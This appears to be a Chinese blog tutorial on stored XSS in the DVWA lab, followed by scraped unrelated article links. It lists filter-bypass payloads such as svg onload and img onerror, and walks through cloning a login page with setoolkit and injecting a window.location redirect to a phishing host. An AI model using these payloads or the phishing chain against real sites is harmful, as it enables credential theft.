文章目录

  • 一.xss储存型概念
  • 二.储存型图片演示
  • 三.代码分析
  • 四.dvwa_储存型_演练
  • 五.总结

一.xss储存型概念

黑客发现个人信息或发表文章,等,处存在xss漏洞(并且是储存在数据库中),可以直接插入js代码。

比如在登陆处写下,下图中的代码,发现弹出了我们写的js代码,则说明存在xss储存型漏洞,并且是储存到数据库中的

当发现以后,我们就可以利用该漏洞,写入恶意js代码,当用户点击时,就会盗取用户信息等。

二.储存型图片演示

1.黑客将js脚本注入到存在储存型xss的位置
2.受害者登陆网站,点击js注入的位置
3.黑客获取cookie,得到登陆权限

三.代码分析

dvwa中的xss漏洞分为四个等级,我们来分析四个等级的源码。(这里借用一下大佬的图片,因为赶时间,所以偷两张图。)

可以看到初级就过滤了数据库特殊字符,没做其他任何处理,
导致很容易触发xss

可以看到mssage变量过滤了mysql中的符号,HTML实体化
那么过滤掉mysql中的符号。
可以看到还是过滤不全面。
正规的过滤应该是用户输入的变量都进行多重过滤,否则容易触发xss


可以看到name中过滤掉script相关信息
而mssage中依然没有做过严谨的过滤
虽然过滤掉了script标签但是我们可以使用其他标签
如:

<svg οnlοad="alert(1)">
<img src=1 Onerror=alert("xss")>
<body Onload=alert(1)>
<body Onpageshow=alert(1)>
<video Onloadstart=alert(1)> src="/media/hack-the-planet.mp4"/>
<style Onload=alert(1)></style>

最后看看安全级别
可以看到都使用了多重过滤
并且两个用户输入的变量都被HTML实体化,这种过滤基本就无法xss

四.dvwa_储存型_演练

这里我们以低级的演示
在输入框注入js代码

发现弹出js,
因此,存在js注入,此时我们就可以结合setoolkit社工弹窗,盗取账户密码


我们先在kali中制作一个钓鱼网站
打开setoolkit


输入1,

输入2,

输入3

输入2,克隆网站


这里不填,回车,自动生成网卡的ip

选择克隆的网站,输入我们要克隆的网站

可以看到已经克隆成功,当用户输入密码时这里就会回显

好,我们回到这里来
尝试输入恶意js代码,发现限制了长度


按f12选到攻击的位置

修改输入长度为1000(都可以只要够写就行)


写一个重定向代码,当用户点击这个功能时,就会被重定向到我们钓鱼页面
window.location="http://xxxxxxxx"

现在假如别人登录了网站
点击了这个网站的这个按钮


他就会跳转到自己网页(钓鱼页面)的登陆页面,


如果他输入密码

我们刚刚这钓鱼页面就收到账户密码

五.总结

1.如果发现script标签被过滤,就尝试其他标签
2.一般结构csrf漏洞同时利用会触发更可怕的漏洞利用
3.储存型xss和反射型最大的区别就是,储存型储存在数据库中,永久有效,只要访问了网站的人都有可能触发xss攻击。
反射型只能一时的有效,比如反射型常见手段,恶意链接让别人点击,盗取cookie

dvwa_xss_储存型相关推荐

  1. PhpMyWind储存型XSS漏洞练习(CVE-2017-12984)

    0x01 介绍 又是一款开源CMS内容管理系统PhpMyWind,在小于等于5.4版本中存在储存型XSS漏洞.如下图所示,这个就是发生储存型XSS漏洞的代码 0x02 演示 1.第一张图是客户留言时, ...

  2. pikachu反射型xss(get、post)、储存型xss

    pikachu 反射型xss(get) 在message后输入 <a href="javascript:alert(1)">XSS Test</a> 即可在 ...

  3. 记一次挖掘115网盘反射型xss,08xss的储存型xss

    记一次对115分站简单绕过过滤继续实现xss,08xss平台也中枪!! 115反射型xss url:http://115.qiye.115.com/disk/?ac=select_public_fil ...

  4. php抓取%3ctr%3e中指定的数据,程氏舞曲CMSPHP3.0 储存型xss getshell

    Author:roker 这个cms 以前 90有人发了个getshell,当时 是后台验证文件的问题 官网已经修补了,所以重新下了源码 因为 后台登入 还需要认证码 所以 注入就没看了. 存在 xs ...

  5. 台湾前十大科技公司拼不过三星(往后一点三星都不要买啦!)

    台湾前十大科技公司拼不过三星,往后一点三星都不要买啦!本来还可以买它的内存和液晶,不过现在是一点都不能买了,再买就真反了他了! 三星像糖果也像毒药,让台湾LED类股1年涨3倍,但也让鸿海市值一夜之间消 ...

  6. 2018年看好这些半导体企业

    来源:钜亨网 对半导体产业来说,去年是一个大年,无论哪个领域,都挣得盘满钵满.进入了2018,半导体产业将会面临哪些新状况?让我们来盘点一下! DRAM今年供需稳定记忆体厂商持续获利的好年 DRAM价 ...

  7. Web 安全漏洞之 XSS 攻击,Java 开发必看!

    编者说:作为JS系工程师接触最多的漏洞我想就是 XSS 漏洞了,然鹅并不是所有的同学对其都有一个清晰的认识.今天我们请来了@卢士杰 同学为我们分享他眼中的 XSS 漏洞攻击,希望能帮助到大家. 什么是 ...

  8. web安全-XSS攻击(一)

    XSS攻击和SQL注入都是web安全中很常见的攻击方式,最近先学习XSS攻击,待到XSS学完后再去学习SQL注入,哇(感慨一番),这些知识真的太有趣了. 在开始之前,有必要了解一下概念 1.XSS跨站 ...

  9. PHP-代码审计-XSS

    文章目录 XSS防御函数 XSS挖掘流程 黑盒挖掘 白盒挖掘 DVWA白盒挖掘演练 储存型 反射型 xss利用姿势复习 XSS防御函数 htmlentities() 函数 把字符转换为 HTML 实体 ...

最新文章

  1. 如何使用Bootstrap4和ES6创建自定义确认框
  2. matlab中conv滤波,其中是Matlab(imfilter)和TensorFlow中偶数滤波器(6x6)的中心像素(转速表nn.conv2d)?...
  3. C++命名空间 namespace的作用和使用解析
  4. Linux中java项目环境部署,简单记录一下
  5. 动态规划:求最长公共子序列和最长公共子串
  6. C++Primer Plus (第六版)阅读笔记 + 源码分析【第四章:复合类型】
  7. 线性回归python代码实现
  8. LongListSelector 控件 在 wp7 和wp8中的不同之处
  9. Battery Health 3 for Mac(电池健康管理工具)
  10. 前端那些事之时间轴篇
  11. 添加内核驱动模块(3)(mydriver.c+ Konfig+Makefile )
  12. Linux 系统设置图形界面启动和黑窗口启动
  13. ElasticSearch教程——数据一致性
  14. 重庆交通大学计算机科学与技术怎么样,计算机科学与技术 大学实力哪家强?(干货)...
  15. 什么是情感化设计?UI设计中情感化设计的目的
  16. H3C与阿里云网关建立IPSEC并启用BGP
  17. org.springframework.mail.MailAuthenticationException: Authentication failed; nested exception is jav
  18. 简易图片打像素标签工具
  19. matlab学位论文绘图美化工具_MATLAB绘图美化超全超实用教程
  20. Java中mongodb指定DB通过aggregate聚合查询操作示例

热门文章

  1. Linux - 将Crontab中的命令输出按照当前日期进行存储
  2. 测试工具:Windows下超强日志工具BareTail
  3. 017_python常用小技巧
  4. 每次都能遇到的莫名其妙问题,谨记,速查手册
  5. 算法-动态规划(01背包)
  6. H.264 Quantization
  7. 一个女程序员的男友需求说明书(转)
  8. java消息分发_Kafka教程设计思想之消息分发策略
  9. ubuntu18.04下利用deepin-wine-wechat安装微信显示问题
  10. object的实例是 python_Python:type、object、class与内置类型实例